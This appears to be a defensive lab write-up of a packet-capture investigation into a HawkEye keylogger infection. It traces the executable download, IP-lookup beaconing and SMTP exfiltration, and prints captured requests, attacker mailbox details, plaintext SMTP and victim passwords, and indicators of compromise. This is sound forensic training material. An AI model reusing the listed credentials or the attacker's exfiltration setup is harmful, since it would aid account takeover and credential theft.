Skip to main content

CDEF-HawkEye

Table of Contents
Difficulty: Medium
OS: Windows
Date: 2026-03-18

TL;DR
#

A victim host at 10.4.10.132 downloaded a malicious executable via HTTP from an OVH-hosted server in France. The file was a HawkEye Keylogger - Reborn v9 dropper, detected by 58 out of 72 vendors on VirusTotal. After execution, the malware periodically beaconed to bot.whatismyipaddress.com to retrieve the victim’s external IP, and exfiltrated harvested credentials every 10 minutes via SMTP to an attacker-controlled inbox at macwinlogistics.in.

Initial Analysis
#

Protocol Hierarchy
The capture contains 4003 frames. TCP dominates at 93.3% of packets. Two protocols stood out as relevant to a investigation — HTTP (0.4% of packets but 84.8% of bytes, indicating a large file transfer) and SMTP (3.7% of packets, suggesting email activity). I decided to start with HTTP since the large byte ratio suggested a file download.

Malware Download
#

I found a GET request from the victim 10.4.10.132 to 217.182.138.150:

1GET /proforma/tkraw_Protected99.exe HTTP/1.1

The server responded with HTTP/1.1 200 OK and Content-Type: application/x-msdownload, confirming a successful executable download.

HTTP download

I looked up the source IP 217.182.138.150 on AbuseIPDB - it was not found in their database, but the IP belongs to OVH SAS, a French hosting provider, located in Dunkerque, France. Attacker infrastructure hosted on VPS/hosting providers like OVH is common for malware distribution.

AbuseIPDB

I then submitted the file hash to VirusTotal:

1MD5: 71826ba081e303866ce2a2534491a2f7
2File: tkraw_Protected99.exe (1.93 MB)

58 out of 72 security vendors flagged it as malicious. The popular threat label is trojan.autoit/gen8, with family labels including hawkeye - confirming this is a HawkEye Keylogger dropper packed with AutoIt. VirusTotal behavior tags include persistence, clipboard, checks-network-adapters, detect-debug-environment and long-sleeps - consistent with a keylogger.

VirusTotal

Beaconing Behavior
#

After the download, filtering HTTP traffic revealed a recurring pattern - every 10 minutes, 10.4.10.132 sent a GET / request to 66.171.248.178.

1GET / HTTP/1.1
2Host: bot.whatismyipaddress.com
3Connection: Keep-Alive

The server responded with the victim’s external IP address - 173.66.146.112. This is a common technique used by malware to determine the public IP of the infected machine before exfiltration, allowing the attacker to correlate the victim’s identity.

IP check beaconing

Data Exfiltration
#

Switching focus to SMTP traffic, I followed the TCP streams on port 25 connections going to 23.229.162.69. The captured SMTP session revealed the attacker’s exfiltration channel:

1From: sales.del@macwinlogistics.in
2To:   sales.del@macwinlogistics.in
3Content-Transfer-Encoding: base64

The credentials used to authenticate to the SMTP server: Sales@23. The email body was base64-encoded - after decoding, the content confirmed the malware identity and revealed stolen credentials:

 1HawkEye Keylogger - Reborn v9
 2Passwords Logs
 3roman.mcguire \ BEIJING-5CD1-PC
 4
 5URL               : https://login.aol.com/account/challenge/password
 6Web Browser       : Internet Explorer 7.0 - 9.0
 7User Name         : roman.mcguire914@aol.com
 8Password          : P@ssw0rd$
 9Password Strength : Very Strong
10...

SMTP exfiltration

The malware exfiltrated keylogger output - including saved browser credentials - every 10 minutes, sending them to the attacker-controlled inbox sales.del@macwinlogistics.in.

IOCs
#

IPs
- 217.182.138.150 — malware distribution server (OVH SAS, France)
- 66.171.248.178bot.whatismyipaddress.com — IP beacon target
- 23.229.162.69 — SMTP exfiltration server
Files
- tkraw_Protected99.exe — HawkEye Keylogger Reborn v9 dropper
- MD5: 71826ba081e303866ce2a2534491a2f7
- SHA256: 62099532750dad1054b127689680c38590033fa0bdfa4fb40c7b4dcb2607fb11
Accounts
- sales.del@macwinlogistics.in — attacker SMTP inbox
- roman.mcguire914@aol.com — stolen credential
Credentials
- SMTP password: Sales@23
- Stolen AOL password: P@ssw0rd$

Recommendations
#

Immediate Actions

  1. Isolate host 10.4.10.132 from the network
  2. Block IP 217.182.138.150 and domain macwinlogistics.in at the perimeter
  3. Reset all credentials for user`roman.mcguire across all services
  4. Scan all hosts on the 10.4.10.0/24 subnet for the same IOCs

Preventive Measures

  1. Deploy email filtering to block outbound SMTP to unauthorized servers
  2. Block outbound connections to IP-lookup services like bot.whatismyipaddress.co
  3. Enable EDR to detect AutoIt-based droppers at execution time
  4. Restrict executable downloads via web proxy - block application/x-msdownloa` from unknown hosts
  5. Enable MFA on all user email accounts to limit impact of stolen credentials

Attack Timeline
#

%%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%%
graph TD
    classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000;
    classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000;
    classDef action fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000;
    classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000;
    classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000;
    classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000;

    A([10.4.10.132
Victim Host]):::start --> B[2019-04-10 20:37:54
HTTP GET tkraw_Protected99.exe
from 217.182.138.150]:::access B --> C[2019-04-10 20:38:15
File downloaded
application/x-msdownload]:::action subgraph Beaconing [Beaconing — every 10 minutes] C --> D[GET bot.whatismyipaddress.com
Returns external IP 173.66.146.112]:::persist end subgraph Exfiltration [Exfiltration — every 10 minutes] D --> E[SMTP to 23.229.162.69
sales.del@macwinlogistics.in
Base64-encoded credentials]:::exfil E --> F([HawkEye Keylogger Reborn v9
Stolen: roman.mcguire914@aol.com
P@ssw0rd$]):::exfil end